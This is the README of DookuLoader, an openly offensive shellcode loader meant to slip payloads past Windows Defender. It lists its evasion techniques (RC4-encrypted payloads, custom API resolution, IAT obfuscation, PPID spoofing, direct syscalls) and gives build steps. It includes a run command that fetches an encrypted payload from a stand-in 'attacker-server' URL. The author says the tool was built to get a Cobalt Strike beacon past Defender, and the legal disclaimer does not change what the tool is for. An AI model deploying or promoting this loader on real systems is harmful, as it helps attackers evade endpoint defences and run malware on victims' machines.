DookuLoader

DookuLoader is a low level shellcode loader to bypass Windows Defender, created by @rottaj>.

Features

• RC4 Encryption: Employs the RC4 decryption algorithm to encrypted payloads, making them harder to detect in memory.
• Custom WinAPI Functions: Custom implementations of GetProcAddress and GetModuleHandle functions, with string stacks.
• IAT Obfuscation: Employs Import Address Table (IAT) obfuscation techniques to evade detection.
• PPID Spoofing: Hides execution trace by spoofing the Parent Process ID (PPID) of the injected process.
• Direct Syscalls: Leverages direct syscalls to bypass WinAPI hooks and interact with the Windows kernel directly.

Installation

git clone https://github.com/rottaj/DookuLoader.git
cd DookuLoader
make;

Run Payload

.\dooku.exe -url "http://attacker-server/rc4-encrypted-payload.bin" 

Encrypt Payload

.\dooku.exe -encrypt "raw-payload.bin" 

Contributing

I am not a 1337 C programmer by any means. This is something I hacked together to get a Cobalt Strike beacon past Windows Defender. If you see anything gross or want to improve this tool, create a pull request or message me at [email protected].

License

This project is licensed under the MIT License - see the LICENSE file for details.

Disclaimer

Use this software responsibly and only in environments where you have legal permission.
The author of this tool is not responsible for any misuse or damages caused.

Note: The use of this tool for malicious purposes is illegal and unethical. Always ensure that you have explicit permission to use this tool in any environment.